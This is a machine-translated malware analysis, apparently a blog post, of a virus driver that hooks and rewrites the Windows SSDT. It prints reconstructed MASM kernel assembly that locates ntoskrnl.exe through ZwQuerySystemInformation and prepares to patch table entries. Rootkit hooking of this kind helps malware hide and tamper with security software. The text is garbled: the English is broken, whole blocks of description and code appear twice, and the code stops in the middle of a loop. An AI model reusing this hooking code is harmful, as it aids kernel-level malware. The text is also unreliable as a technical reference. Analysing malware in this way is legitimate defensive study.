Talk about SSDT hook, before have article of <<SSDT Hook的妙用-对抗ring0 inline hook>> by 堕落天才, If do not understand basic concept, You can watch the article.
Today we through example to learn how use, The example root in article by sudami.
The virus use vbs to call driver for finish it. swk0217d's main feature:
1.Take ssdt function count
2.Take all function on ssdt function table
3.hook ZwQuerySystemInformation
4.unhook ZwQuerySystemInformation
5.In line with user given function address and index of ssdt table, Modify ssdt table
1)When hook ZwQuerySystemInformation is executed, First through ZwQuerySystemInformation to found place of ntosknrl.exe module memory load, Then through export table of ntosknrl.exe to find address of NtQuerySystemInformation. Then hook ZwQuerySystemInformation. Author of the virus main objective is prevent SSDT function to be load, So Author recover in here, Author need use this function, But afraid the function already is tampered.
2)When unhook ZwQuerySystemInformation, Recover original ssdt after Virus author use to finish the function.
.model flat,stdcall
option casemap:none
include w2k\
include w2k\
include w2k\
includelib C:\RadASM\masm32\lib\w2k\ntoskrnl.lib
unk_10B80 db 4Eh ; N
db 0E6h ; ?
db 40h ; @
db 0BBh ; ?
OldSSDTValueOfZwQuerySystemInformation dd 0
; 6E 74 6F 73 6B 72 6E 6C 2E 65 78 65 00 CC 6A 24 = ntoskrnl.exe,0 int3 push 24h
FunctionArray dd 736F746Eh, 6C6E726Bh, 6578652Eh,246ACC00h
; ZwQuerySystemInformation get memory load address of ntoskrnl.exe
1.Take ssdt function count
2.Take all function on ssdt function table
3.hook ZwQuerySystemInformation
4.unhook ZwQuerySystemInformation
5.In line with user given function address and index of ssdt table, Modify ssdt table
1)When hook ZwQuerySystemInformation is executed, First through ZwQuerySystemInformation to found place of ntosknrl.exe module memory load, Then through export table of ntosknrl.exe to find address of NtQuerySystemInformation. Then hook ZwQuerySystemInformation. Author of the virus main objective is prevent SSDT function to be load, So Author recover in here, Author need use this function, But afraid the function already is tampered.
2)When unhook ZwQuerySystemInformation, Recover original ssdt after Virus author use to finish the function.
.model flat,stdcall
option casemap:none
include w2k\
include w2k\
include w2k\
includelib C:\RadASM\masm32\lib\w2k\ntoskrnl.lib
unk_10B80 db 4Eh ; N
db 0E6h ; ?
db 40h ; @
db 0BBh ; ?
OldSSDTValueOfZwQuerySystemInformation dd 0
; 6E 74 6F 73 6B 72 6E 6C 2E 65 78 65 00 CC 6A 24 = ntoskrnl.exe,0 int3 push 24h
FunctionArray dd 736F746Eh, 6C6E726Bh, 6578652Eh,246ACC00h
; ZwQuerySystemInformation get memory load address of ntoskrnl.exe
;typedef struct _SYSTEM_MODULE_INFORMATION // Information Class 11
; ULONG Reserved[2]; +0
; PVOID Base; +08h
; ULONG Size; +0ch
; ULONG Flags; +10h
; USHORT Index; +14h
; USHORT Unknown; +16h
; USHORT LoadCount; +18h
; USHORT ModuleNameOffset; +1Ah
; CHAR ImageName[256]; +1Ch
; ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
; IN OUT PVOID SystemInformation,
; IN ULONG SystemInformationLength,
;typedef struct _tagSysModuleList {
; ULONG ulCount;
;s = NtQuerySystemInformation( SystemModuleInformation, pRet,
;sizeof( SYSMODULELIST ), &nRetSize );
xor ebx, ebx
mov [ebp-24h], ebx
mov [ebp-4], ebx
lea eax, [ebp-1Ch]
push eax ;ReturnLength
push ebx ;SystemInformationLength = 0
lea eax, [ebp-20h]
push eax ;SystemInformation
push 0Bh ;SystemModuleInformation,ergodic module
mov esi, ZwQuerySystemInformation
call esi ; ZwQuerySystemInformation ,First call to get need buffer length
mov [ebp-28h], eax
cmp eax, 0C0000004h
push 206B6444h ; ' kdD' lable
push dword ptr [ebp-1Ch] ;apply for length
push ebx ;NonPagedPool
call ExAllocatePoolWithTag
mov edi, eax
mov [ebp-30h], edi ;Keep return value
cmp edi, ebx ;Judge return value whether is null
jnz NextStep
or dword ptr [ebp-4], 0FFFFFFFFh
xor eax, eax
jmp ErrAllocMem
lea eax, [ebp-34h] ;ReturnLength
push eax
push dword ptr [ebp-1Ch] ;SystemInformationLength
push edi ;SystemInformation
push 0Bh ;SystemModuleInformation
call esi ; ZwQuerySystemInformation
mov [ebp-28h], eax
cmp eax, ebx
jl ReleaseMemory
mov eax, [edi]
mov [ebp-1Ch], eax ;Keep YSTEM_MODULE_INFORMATION element count by ZwQuerySystemInformation return
lea esi, [edi+4]
mov [ebp-2Ch], esi ;Save firt address array by SYSTEM_MODULE_INFORMATION return
;typedef struct _SYSTEM_MODULE_INFORMATION // Information Class 11
; ULONG Reserved[2]; +0
; PVOID Base; +08h
; ULONG Size; +0ch
; ULONG Flags; +10h
; USHORT Index; +14h
; USHORT Unknown; +16h
; USHORT LoadCount; +18h
; USHORT ModuleNameOffset; +1Ah
; CHAR ImageName[256]; +1Ch
; ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
; IN OUT PVOID SystemInformation,
; IN ULONG SystemInformationLength,
;typedef struct _tagSysModuleList {
; ULONG ulCount;
;s = NtQuerySystemInformation( SystemModuleInformation, pRet,
;sizeof( SYSMODULELIST ), &nRetSize );
xor ebx, ebx
mov [ebp-24h], ebx
mov [ebp-4], ebx
lea eax, [ebp-1Ch]
push eax ;ReturnLength
push ebx ;SystemInformationLength = 0
lea eax, [ebp-20h]
push eax ;SystemInformation
push 0Bh ;SystemModuleInformation,ergodic module
mov esi, ZwQuerySystemInformation
call esi ; ZwQuerySystemInformation ,First call to get need buffer length
mov [ebp-28h], eax
cmp eax, 0C0000004h
push 206B6444h ; ' kdD' lable
push dword ptr [ebp-1Ch] ;apply for length
push ebx ;NonPagedPool
call ExAllocatePoolWithTag
mov edi, eax
mov [ebp-30h], edi ;Keep return value
cmp edi, ebx ;Judge return value whether is null
jnz NextStep
or dword ptr [ebp-4], 0FFFFFFFFh
xor eax, eax
jmp ErrAllocMem
lea eax, [ebp-34h] ;ReturnLength
push eax
push dword ptr [ebp-1Ch] ;SystemInformationLength
push edi ;SystemInformation
push 0Bh ;SystemModuleInformation
call esi ; ZwQuerySystemInformation
mov [ebp-28h], eax
cmp eax, ebx
jl ReleaseMemory
mov eax, [edi]
mov [ebp-1Ch], eax ;Keep YSTEM_MODULE_INFORMATION element count by ZwQuerySystemInformation return
lea esi, [edi+4]
mov [ebp-2Ch], esi ;Save firt address array by SYSTEM_MODULE_INFORMATION return
mov [ebp-20h], ebx ;Count variable zero clearing
mov eax, [ebp-1Ch] ;Beging for loop
cmp [ebp-20h], eax
jnb ReleaseMemory
push offset FunctionArray
mov eax, [ebp-1Ch] ;Beging for loop
cmp [ebp-20h], eax
jnb ReleaseMemory
push offset FunctionArray
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